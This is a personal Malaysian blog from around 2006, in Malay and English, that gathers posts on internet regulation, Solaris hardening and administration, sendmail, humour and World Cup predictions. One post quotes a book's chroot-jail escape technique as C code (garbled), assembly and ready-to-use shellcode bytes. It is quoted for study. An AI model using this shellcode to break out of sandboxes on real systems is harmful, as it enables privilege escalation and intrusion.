“Kita boleh memantau dengan mendaftarkan semua blog atau laman web di dalam negara kita, tetapi kita jangan lupa, rakyat kita masih boleh mendaftar blog milik mereka di luar negara,” katanya yang menyifatkan perkara itu bukan hanya berlaku di Malaysia, tetapi di seluruh dunia serta sukar dibendung.

Menjawab soalan asal Chong Eng (DAP-Bukit Mertajam), Shaziman berkata, kerajaan mengekalkan prinsip membiarkan pengendali stesen televisyen menjalankan proses saringan masing-masing dan tidak berhasrat mengetatkan kawalan siaran berita dan rancangan televisyen tempatan.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
COMMENT AKU :

1 - Laman web tidak pernah disekat ketika era reformasi kerana untuk menyekat laman web ia adalah sesuatu yang mustahil jika ianya dipublish dari pelayan luar negara (bukan bermaksud aku menyokong reformasi), cuma kebebasan bersuara melalui laman web bagi aku adalah hak individu.

2 - BLOGGER juga adalah seperti penulis, mereka akan menggunakan nama samaran so ungkapan penembak curi yang dilemparkan amat tidak sesuai - bagaimana dengan penulis akhbar harian/gossip?

3 - quote dari berita atas - "Sehubungan itu, saya mengharapkan kebijaksanaan rakyat menilai kesahihan pelbagai isu yang digembar-gemburkan di dalam internet." : ya, rakyat malaysia bijak-bijak semuanya buat apa nak risau kalau berita tersebut tidak betul dan tidak sahih

4 - "Kita boleh memantau dengan mendaftarkan semua blog atau laman web" - kalau empunya dihost di malaysia boleh lah, inikan dunia IT its global be realistic

5 - no comment on stupid comment i heard lately regarding blog lah, internet lah etc.

p/s: pesan atok aku, jangan takut kepada bayang-bayang sendiri nanti kita sendiri yang menggelabah tibah :)

Solaris Hardening Checklist

Solaris Security Hardening Checklist


  1. Was OS loaded from an official Solaris CD?
  2. Are partitions large enough to accommodate patches and upgrades?
  3. Was Tripwire used to baseline the system before connecting it to a network?
  4. Is the system at he current patch level?
  5. Are there 2 system back ups? One on site, one off site?
  6. Is OpenBoot Security level set to command or full?
  7. Has OpenBoot banner been changed?
  8. Has screen autolock been turned on?
  9. Does the system implement Filesystem Quotas?
  10. Does the system have a complex permissions scheme? If so have ACL’s been implemented?
  11. What files/directories have SetUID bit turned on?
  12. Are any files with SetUID bit turned on shell scripts?
  13. Is there a group password that must be used with the newgrp command?
  14. Is root umask set to 077 or 027?
  15. Check system device permissions
  16. Use ASET, COPS, Tiger Tripwire and lsof to audit filesystem.
  17. Make sure no files in /etc are group or other writeable
  18. Make sure /var/adm/utmp and /var/adm/utmpx are 644
  19. Has ls command been aliased to show hidden files?
  20. Has rm command been aliased to ask for verification?
  21. Have filesystem inode numbers been randomized?
  22. Have daemon, lp, bin, sys, adm, uucp, nuucp, listen, nobody, and noaccess accounts been locked?
  23. Have sysadmin and sys groups been locked?
  24. Do any PATH or LD_LIBRARY_PATH statements contain “.”?
  25. Are permissions on /etc/passwd –rw-r—r--?
  26. Are permissions on /etc/shadow –r--------?
  27. Check /etc/default/passwd to ensure password aging and length.
  28. Use grpck to check consistency of /etc/group
  29. Are permissions on /etc/group –rw-r—r--?
  30. Can root log in from console only?
  31. Is su available only to admins?
  32. Are all su attemps logged?
  33. Is system name part of shell prompt for root and other admins?
  34. Has /etc/system been configured to prevent stack-based buffer overflows?
  35. Check /etc/default/cron and crontab files.
  36. Ensure that proper /etc/cron.d/cron.allow and cron.deny files are set up.
  37. Check /var/spool/cron/atjobs file.
  38. Ensure that proper /etc/cron.d/at.allow and at.deny files are set up.
  39. Make sure that scripts and programs launched by cron are readable only by owner.
  40. Are failed login attempts logged to loginlog?
  41. Is ip_forwarding turned off if machine is not used as a router?
  42. Has logcheck auditing tool been installed and used?
  43. Is the system configured to ignore redirects?
  44. If system is not used as a router, is ip_forward_directed_broadcasts turned off?
  45. Is ip_forward_src_routed turned off?
  46. Is root the only user with execute privileges for snoop?
  47. Has auth (identd) been disabled at the firewall by blocking TCP and UDP port 113?
  48. Is sendmail daemon running on a system that is not a mail server?
  49. Has /etc/mail/sendmail.cf been configured to prevent message source routing?
  50. Does only the print service have write access to the print device?
  51. Are only needed services running?
  52. Has inetd tracing been turned on?
  53. HasTCPWrappers been implemented?
  54. Make sure there is not a /etc/hosts.equiv file unless absolutely necessary.
  55. Has Secure Shell (ssh) been installed?
  56. Has anonymous ftp been turned off?
  57. Has ftpd logging been turned on for logging and debugging?
  58. Have root,uupc, and bin been added to /etc/ftpusers file to prohibit ftp connections?
  59. Has tftp been turned off?
  60. Is a GUI installed only on necessary systems?
  61. Is there any type of Intrusion Detection System installed?
  62. Has Diffie-Hellman or Kerberos Authentication been configured?
  63. Has IPsec been implemented?
  64. If DNS is used, has a Split-Horizon DNS architecture been implemented?
  65. If DNS is used, has BIND version been configured to stop illicit zone transfers?
  66. Is the latest version of BIND being used?
  67. If NIS is used, have NIS maps been moved out of /etc directory?
  68. If NIS is used, does root user have the only read and write access to /var/yp directory?
  69. Is NIS domain name different from DNS domain name?
  70. If NIS is used, has /var/yp/securenets beent implemented to make NIS maps available only to specific networks or systems?
  71. Are NIS clients bound to specific servers?
  72. Use rpcinfo –b option to detect illicit NIS servers.
  73. If NIS or NIS+ is used, does nsswitch.conf specify “passwd: hosts nis” or “passwd: hosts nisplus” to keep root account local?
  74. If NIS+ is used, ensure that there are no rights for “nobody” using niscat command.
  75. If NIS+ is used, does “nobody” have access rights?
  76. If NIS+ is used, is security level set to at least 2?
  77. If NIS+ is used, is it administered with admintool?
  78. Are all NIS+ tables backed up daily?
  79. Are NIS+ transactions flushed daily?
  80. Has nscd caching been disabled?
  81. If NFS is used, have systems that can mount an NFS directory been restricted with the share command in /etc/dfs/dfstab?
  82. Are permanent NFS client mounts set up in /etc/vfstab?
  83. Has NFS Portmon been set in /etc/system?
  84. Are any servers NFS clients?
  85. Have indirect automounter maps been set up?
  86. Is automounter browsing disabled on NFS clients?
  87. Have all services been commented out of /etc/inetd.conf?
  88. Are permissions on sulog and loginlog set to 640?
  89. Has /etc/issue file been created to display warning banner for telnet logins?
  90. Has /etc/default/login been set so that root cannot telnet into the system directly?
  91. Has /etc/default/telnetd been configured to remove the OS banner?
  92. Has /etc/default/ftpd been configured with a warning banner?
  93. Has the wheel group been created and su command in both /usr/bin/su and /sbin/su.static limited to it?
  94. Have permissions on .rhost,.netrc, and /etc/host.equiv been set to 0?
  95. Have TCP initial sequences been randomized by setting TCP_STRONG_ISS=2 in /etc/default/inetinit?
  96. Has ulimit been set to 0 in the system profile to restrict core file generation?
  97. Are there any unnecessary world writeable files?
  98. Do all users have a password set in /etc/shadow?
  99. Does each user have his/her own account and not a shared account?
  100. Does each user have a unique UID?
  101. Has CD-ROM drive been removed from servers after initial installation?
  102. Is SetUID disabled on local and remote disk partition mounts?
  103. Are any guest or default accounts on the system?
  104. Have all inactive user accounts been removed?
  105. Do only authorized users have write access to any bin or lib directories?
  106. Check for all . directories and ensure their validity.
  107. Have ICMP type 17 packets (MASKREQ) been blocked at the router or firewall?
P/S: SAVE FOR MY REFERENCE

:- STARTING TODAY I'LL INCLUDE MOOD OF THE DAY (MOTD) NOT MESSAGE OF THE DAY (MOTD) LIKE RESIDE IN THE UNIX SYSTEMS :)

MOTD : :-)

Surat Terbuka Untuk CITY

Semakin ramai golongan kreatif di Malaysia, ini antara contohnya haha lawak ahh read the rest:

Kepada Sdra Pengantin,Tahniah di atas perkahwinan sdr yang bakal menjelang. Kami kawan-kawansemuanya mengucapkan tahniah dan selamat berbahagia, serta semoga jodohberpanjangan, dan insya Allah kami hadir di majlis saudara.

Bagaimanapun, setelah mengambil tahap kemeluatan rakyat Malaysia terhadaplaporan-laporan media berkaitan persiapan perkahwinan beberapa ‘celebrity’tempatan yang bakal berlangsung, sukacita kami mencadangkan kepada sdrdan bakal isteri agar tidak terjebak dalam perkara-perkara yang tidaksenonoh seperti berikut:

(1) Sekiranya sdr bercadang mengadakan majlis perkahwinan di pusat-pusat persidangan seperti Kuala Lumpur Convention Centre, diharap sdr dapat memberi pertimbangan kepada pengguna-pengguna jalanraya di sekeliling tempat majlis itu diadakan. Besar harapan kami sekiranya sdr tidak menyekat atau mengubah laluan trafik, terutamanya ketika sdr mengadakan raptai penuh majlis perkahwinan pada hari dan masa orang-orang tengah sibuk nak pergi atau balik dari kerja.

(2) Kami tidak mempunyai halangan sekiranya sdr dan isteri mengimpikan majlis perkahwinan ala “Cinderella”. Mana-mana pasangan pengantin juga berhak memilih tema-tema seperti “Beauty and The Beast”, “Snow White & The Seven Dwarfs”, “Happy Happy Puffy Amy Yumi”, “PowerPuff Girls”, “Courage The Cowardly Dog”, malah ala “Basic Instinct” atau “XXX”, err, maksud saya,”X-Men”, sekali pun. Kami hanya memohon jasa baik sdr agar tidak menghuraikan impian sdr dengan panjang lebar dalam surat khabar contohnya tentang gaun pengantin tujuh lapis (tak panas ke?), kek tujuh tingkat dengan bertangga, naik kereta kuda tujuh roda dan sebagainya. Sesungguhnya, dalam zaman di mana kita perlu memulihara alam sekitar, amat tidak wajar sekal banyak pokok terpaksa dikorbankan untuk diproses menjadi kertas suratkhabar, tetapi dicetak dengan cerita-cerita fantasi seperti itu.

(3) Adalah juga dicadangkan agar sdr dan pihak keluarga belah pengantin perempuan, utamanya ibu bapa mertua, membuat “message alignment” agartidak mengeluarkan kenyataan-kenyataan yang bercanggah berkaitanperkara-perkara seperti duit hantaran. Sesungguhnya kami tidak mempunyai apa-apa halangan tentang jumlah duit hantaran, sama ada RM88,888.88 atau RM22,222.22 atau RM00,000.00, dan juga tidak hirau sama sekali sekiranya duit hantaran itu dibayar dalam bentuk Ringgit Malaysia, rupiah Indonesia atau menggunakan kad kredit. Yang penting, sdr dan isteri selamat diijabkabulkan denganmemenuhi syariah.

(4) Sekiranya sdr dan isteri bertuah menerima tawaran mana-mana stesentelevisyen agar majlis sdr disiarkan secara langsung di tv kelak, besar harapan kami sekiranya sdr memaklumkan stesen televisyen tersebut agar tidak membatalkan rancangan-rancangan lain yang lebih penting dan bermakna seperti EPL, CSI, dan Formula 1.

Kami juga mengucapkan tahniah sekiranya demi memenuhi permintaan segelintir peminat sdr, sdr perlu melangsungkan majlis perkahwinan tambahan di Indonesia, Inner Mongolia, Swaziland, Bukina Faso atau Solomon Islands, tetapi kami amat amat amat berterima kasih sekiranya sdr memaklumkan kepada semua stesen televisyen di Malaysia agar tidak menyiarkan majlis perkahwinan sdr sepanjang masa, termasuk semasa tayangan Berita Perdana. Mujurlah Akademi Fantasia sudah selesai.

Kalau tidak, harus pusingan Final AF terpaksa ditangguh semata-mata nak menyiarkan majlis perkahwinan sdr. Bukankah itu akan menjejaskan pendapatan syarikat-syarikat telekomunikasi negara (Maxis, Celcom, Digi), seterusnya membawa kepada kemerosotan ekonomi?

Jasa baik sdr dan bakal isteri dalam memberi pertimbangan yang adil dan sewajarnya kepada rayuan rakyat marhaen seperti kami amat kami alu-alukan dan didahului dengan setinggi-tinggi penghargaan dan jutaan terima kasih. Semoga pernikahan sdr dan bakal isteri direstui dan diberkahi Allahs.w.t.Aaaamin.

Selamat menjadi Pengantin Baru (tanpa menyusahkan orang lain)!

Salam hormat,Siti K.



p/s: Satu lagi lawak yang biasa kedengaran semenjak dia mau kawin ni ialah about Tiara, City and Serena :D

Solaris10 cool command

FIbre Channel Device management command

In solaris10 there's one command that will help you get all info about your fc (fibre channel) device unlike in solaris8 or solaris9 and its called fcinfo;

fcinfo– Fibre Channel HBA Port Command Line Interface

SYNOPSIS

fcinfohba-port [-l] [HBA_port_WWN…]
fcinforemote-port [-ls] [-pHBA_port_WWN] [REMOTE_port_WWN…]
fcinfo [-V]
fcinfo [-?]

DESCRIPTION

fcinfo is a command line interface that collects administrative information on fibre channel host bus adapter (HBA) ports on a host. It also collects data on any fibre channel targets that may be connected to those ports in a Storage Area Network (SAN).

Example:


# fcinfo hba-port

HBA Port WWN: 210000e08b074cb5
OS Device Name: /dev/cfg/c1
Manufacturer: QLogic Corp.
Model: 375-3108-xx
Type: N-port
State: online
Supported Speeds: 1Gb 2Gb
Current Speed: 2Gb


BTW, in solaris 8/9 if you wanna get info for FC device few commands involved :
cfgadm -alv, luxadm -r port, luxadm probe, prtpicl or prtfonf and grep for your card target
no in dmesg and /var/adm/messages

P/S: Solaris10 - why they dont want to use it so many shorcuts command in there :)
Node WWN: 200000e08b074cb5

How do I configure sendmail not to use DNS?

Boloq woq'

How do I configure sendmail not to use DNS?

Why we dont want DNS?
In situations where you're behind a firewall, or across a dial-up line, there are times when you need to make sure that programs (such as sendmail) do not use the DNS at all. Or I want to do an email relay but i dont want to put my machine as a dns servers locally.

And note that you'll need to forward all your outbound mail to another machine as a "relay" (one that does use DNS, and understands how to properly use MX records, etc...), otherwise you won't be able to get mail to any site(s) other than the one(s) you configure in your /etc/hosts file (or whatever). The use of a smart host is one way to do this; the following in your .mc will do:
define(`SMART_HOST', `name.of.smart.host')dnl
Also, starting with 8.9, it may help to include the following in your .mc file:
FEATURE(`accept_unresolvable_domains')dnl
FEATURE(`accept_unqualified_senders')dnl
And starting with 8.12, changes to submit.cf are required as well; the following in your submit.mc can minimize the problem:
define(`confDIRECT_SUBMISSION_MODIFIERS', `C')dnl

HOWEVER, i dont know THIS one also apply to which version of sendmail im not very sure but it works

Put this entry in /etc/mail/mailertable file
hostname {esmtp}:domain

DONE!!!!!!!!!!!!!!!!!!!!

p/s: Boloq Woq' dalam bahasa loghat percakapan terengganu bermaksud berkecamuk/serabut/tidak terurus

:D bukan maksud aku pun begitu ya..................



PETRONAS

Siot la....... aku x nak beli lagi minyak primax3 dia yang tak berapa pergi jauh pun :(

Damn You Dirty Apes

Israel

One month after

Its been a month from the last post i made

Reveal:
My new hobby - surfing job recruitment websites . e.g: jobstreet.com, jobsdb, jensjob etc.

p/s:_________________

Review: Dude i need a GURU now !!

Today, i read and study this stuff - asm its been a long time ago when i learn the assembly language back at UTM. As i got free time i decide to do more reading on an exploit world on how to write the exploit code from the beginning ~~ for sure i can catch up slowly but a GURU with me now will give me much less headache !! This is the book -

Assembly and Shellcode
Writing Security Tools and Exploits
by James C. Foster and Vincent Liu
Syngress Publishing © 2006

A snippet from the book

The following technique will break out of chroot jails on new Linux kernels with ease. This technique works by first creating a directory inside the chroot jail. After this directory is created, we chroot that particular directory. We then iterate 1024 times, attempting to change to the directory ../. For every iteration, we perform a stat() on the current ./ directory and if that directory has the inode of 2, we chroot to directory ./ one more time and then execute the shell. In C, the code looks like the following:

 1  int main(void)
2 {
3 int i;
4 struct stat sb;
5
6 mkdir("A", 0755);
7 chroot("A");
8
9 for(i = 0; i < st_ino ="=">

Converted to Assembly, the code looks like this:

 1  .globl main
2
3 main:
4 xorl %edx, %edx
5
6 pushl %edx
7 pushl $0x2e2e2e2e
8
9 movl %esp, %ebx
10 movw $0x01ed, %cx
11
12 leal 0x27(%edx), %eax
13 int $0x80
14
15 leal 61(%edx), %eax
16 int $0x80
17
18 xorl %esi, %esi
19
20 loop:
21 pushl %edx
22 pushw $0x2e2e
23 movl %esp, %ebx
24
25 leal 12(%edx), %eax
26 int $0x80
27
28 pushl %edx
29 push $0x2e
30 movl %esp, %ebx
31
32 subl $88, %esp
33 movl %esp, %ecx
34
35 leal 106(%edx), %eax
36 int $0x80
37
38 movl 0x4(%ecx), %edi
39 cmpl $0x2, %edi
40 je hacked
41
42 incl %esi
43 cmpl $0x64, %esi
44 jl loop
45
46 hacked:
47 pushl %edx
48 push $0x2e
49 movl %esp, %ebx
50
51 leal 61(%edx), %eax
52 int $0x80

Lastly, converted to bytecode and ready for use in an exploit, the code looks like the following:

 1  const char neo_chroot[] =
2 "\ x31\ xd2" /* xorl %edx, %edx */
3 "\ x52" /* pushl %edx */
4 "\ x68\ x2e\ x2e\ x2e\ x2e" /* pushl $0x2e2e2e2e */
5 "\ x89\ xe3" /* movl %esp, %ebx */
6 "\ x66\ xb9\ xed\ x01" /* movw $0x1ed, %cx */
7 "\ x8d\ x42\ x27" /* leal 0x27(%edx), %eax */
8 "\ xcd\ x80" /* int $0x80 */
9 "\ x8d\ x42\ x3d" /* leal 0x3d(%edx), %eax */
10 "\ xcd\ x80" /* int $0x80 */
11 "\ x31\ xf6" /* xorl %esi, %esi */
12 "\ x52" /* pushl %edx */
13 "\ x66\ x68\ x2e\ x2e" /* pushw $0x2e2e */
14 "\ x89\ xe3" /* movl %esp, %ebx */
15 "\ x8d\ x42\ x0c" /* leal 0xc(%edx), %eax */
16 "\ xcd\ x80" /* int $0x80 */
17 "\ x52" /* pushl %edx */
18 "\ x6a\ x2e" /* push $0x2e */
19 "\ x89\ xe3" /* movl %esp, %ebx */
20 "\ x83\ xec\ x58" /* subl $0x58, %ecx */
21 "\ x89\ xe1" /* movl %esp, %ecx */
22 "\ x8d\ x42\ x6a" /* leal 0x6a(%edx), %eax */
23 "\ xcd\ x80" /* int $0x80 */
24 "\ x8b\ x79\ x04" /* movl 0x4(%ecx), %edi */
25 "\ x83\ xff\ x02" /* cmpl $0x2, %edi */
26 "\ x74\ x06" /* je */
27 "\ x46" /* incl %esi */
28 "\ x83\ xfe\ x64" /* cmpl $0x64, %esi */
29 "\ x7c\ xd7" /* jl */
30 "\ x52" /* pushl %edx */
31 "\ x6a\ x2e" /* push $0x2e */
32 "\ x89\ xe3" /* movl %esp, %ebx */
33 "\ x8d\ x42\ x3d" /* leal 0x3d(%edx), %eax */
34 "\ xcd\ x80"; /* int $0x80 */

This is the chroot breaking code converted from C to Assembly to bytecode.

When written in Assembly, careful attention was paid to assure that no opcodes

that use Null bytes were called and that the size was kept down to a minimum.

P/S: ANYMASTER OR GURU OUT THERE, I NEED TO TALK TO YOU WANNA ASK U SOMETHING

P/S2: I read this book ~wink and grow rich: one man ask a successfull dentist

that man ask the dentist "hello sir, how u had this success with you and i
saw u really had a good life, how did u make it", then the dentist answer
"it's simple, by become better dentist !"..............:wink

More drama in Malaysia Politic

Wat say U !!

Bagi aku keadaan sudah menjadi semakin menarik nasiblah pilihanraya lama lagi, by the time pilihanraya maybe senario ini sudah sepi well Malaysia (bukan melayu) mudah lupa hehe.


Wait, senario politik Malaysia aku tak nak ulas sangat nanti jadi kes sape susah mereka dan keluarga mereka jugak yang susah (keluarga akulah tu )hehe. BTW, looking at what happen nowdays something that might be interesting will be happened soon.

Beberapa watak penting dalam senario politik sekarang -:
Watak Utama - Pak Lah , Dr M, DSAI (anwar)
Watak Pembantu - Khairy, D. Shahrir Samad, Samy Vellu

Well fikirkanlah the sintesis of the story cuba kaitkan anda akan dapat jalan cerita yang menarik.

p/s: Review of Malaysian Politics Culture 2000-2008 (maybe) -someone had to wrote it down into the paper very interesting


World Cup Period - for male only

Contoh surat rasmi terbaik pernah aku baca hahahhaa.. sape la yang rajin betul buat surat ni haha



Untuk isteri / awek / kekasih tersayang*, dimana saja berada...

Ayang /Anja / Honey / Darling / Dinda / Intan payung / gunung berapi etc *

1. Seperti yang sedia maklum , abang setiap bulan terpaksa
menghadapi perangai ayang yang berubah mengikut pasang surut bulan setiap
bulan tanpa gagal. Abang selalu menjaga hati ayang tanpa gagal ketika
kedatangan period ayang tanpa soal. Abang jaga ayang bagaikan menatang
minyak yang penuh. Amat besarnya pengorbanan yang abang lakukan selama ini
untuk menjaga kerukunan perhubungan kita yang telah bertapak sejak lama?
Kini relakah ayang melakukan pengorbanan yang agak kecil terhadap abang?

2. Dr. Joseph Blatter dari Klinik FIFA telah mengesahkan yang
abang akan mengalami period abang yang hanya berlaku 4 tahun sekali ini
dari 9hb Jun 2006 hingga 9 Julai 2006. Kesan period ini mungkin akan
berlanjutan sehingga seminggu selepas tarikh tersebut. Abang akan
menghadapi masalah untuk tidur malam dan mungkin berjaga hingga ke awal
pagi. Untuk mengurangkan tekanan dan mood abang dalam tempoh tersebut,
preskripsi dan cadangan di bawah ini telah disarankan :-

3. Dalam tempoh tersebut ayang dikehendaki sentiasa membaca
berita sukan pada akhbar harian yang menfokus tentang Piala Dunia 2006 di
Jerman. Jika ayang gagal melakukan perkara ini, ayang mungkin rasa terabai
jika tidak dapat berkomunikasi dengan baik dengan abang pada masa
tersebut. Oleh itu ayang janganlah komplen jika rasa diri diabaikan dalam
masa period ini.

4. Dalam tempoh period abang ini adalah dimaklumkan bahawa
ayang akan diberi kebebasan untuk menonton rancangan tv kegemaran ayang
dari bermula dari 6 pagi hingga ke 9 malam. Manakala dari 9 malam ke 6
pagi, abang yang akan memegang remote control dan hak memilih chanel yang
digemari. Ayang dilarang sama sekali mengerling ke arah remote control
pada masa tersebut.

5. Jika ayang terpaksa melintasi di hadapan tv di waktu
tersebut, ayang hendaklah tunggu sehingga masa rehat atau commercial break
ataupun merangkak perlahan-lahan agar tidak menganggu konsentrasi abang.
Jika ayang bercadang untuk di hadapan tv pada waktu tersebut,
pastikan ayang memakai pakaian semula selepas itu kerana abang takut ayang
akan demam kerana kesejukan. Abang takut abang tidak mempunyai masa untuk
membawa ayang ke klinik dan juga melayan ayang selepas itu.

6. Semasa perlawanan langsung disiarkan, abang seakan buta,
pekak dan juga bisu kecuali bila abang memerlukan pertolongan ayang untuk
membuat air atau mengambil makanan ringan. Kasih sayang abang akan
bertambah kepada ayang jika ayang sentiasa memastikan makanan ringan
sentiasa tersedia untuk abang semasa perlawanan berlangsung.

7. Ayang adalah dialu-alukan untuk duduk dan menikmati
perlawanan bersama abang tetapi ayang hanya boleh bercakap semasa half
time atau commercial break. Ayang dilarang sama sekali menggoda abang pada
masa ini terutama jika pasukan yang abang sokong sedang ketinggalan atau
berada diambang kekalahan.

8. Replay untuk setiap gol yang dijaringkan adalah amat
penting. Berapa kali replay disiarkan abang tetap mau melihatnya. Ayang
tak perlu merungut mengata bahwa gol tu dah tengok kenapa nak tengok lagi?

9. Ayang perlu memberitau saudara mara atau rakan karib bahwa
jemputan ke jamuan atau kenduri yang diadakan selepas 9 malam ke atas yang
memerlukan kehadiran abang tidak dapat dipenuhi kerana abang tak nak
pergi.

10. Jika kawan abang menjemput kita ke rumah mereka untuk
menyaksikan perlawanan langsung bersama-sama, maka ayang perlu bersiap
sedia dengan kadar segera?

11. Selepas period abang ini abih..ayang dilarang merungut :
siib baik world cup 4 tahun sekali jer? kerana abang telah immune dengan
rungutan tersebut dan juga selepas period ini akan ada pula English
League, Italian League, UEFA League, Piala Malaysia dan lain-lain.

12. Atas kerjasama dan timbang rasa ayang ini, jika pasukan
yang abang sokong menang piala dunia atau player yang abang sokong menang
kasut atau bola emas..pandai-pandai la ayang bodek abang untuk dapatkan
hadiah?. Jika sebaliknya? hendaklah ayang turut berduka?.

13. Akhirkata. Majulah sukan untuk negara!.

Abang yang sentiasa menyayangimu walaupun period ayang datang
setiap bulan.

Suami / bf / kekasih yang tersayang *

* potong mana yang tidak berkenaan.

Quote #June12-World Cup

MYprediction

This is my prediction for the last 16 teams who are going to qualify for the second round

A (Germany & Ecuador)
B (England & Sweden)
C (Argentina & Ivory Cost or Netherland)
D (Portugal & Mexico)
E (Italy & USA)
F (Brazil & Australia)
G (France & South Korea)
H (Spain & Ukraine)

P/S:Brazil is going to lift up the trophy for the 6th times, any arguement? The teams full of talents ...

Quote #June-8th >> 666

TWO DAYS AGO
06-JUNE-2006 == 06/06/06 == 666

Im a muslim so i dont believe all this things, but u may refer to this site about this 666 things. It said 666 as mark of the beast..

p/s: IMHO, its all crap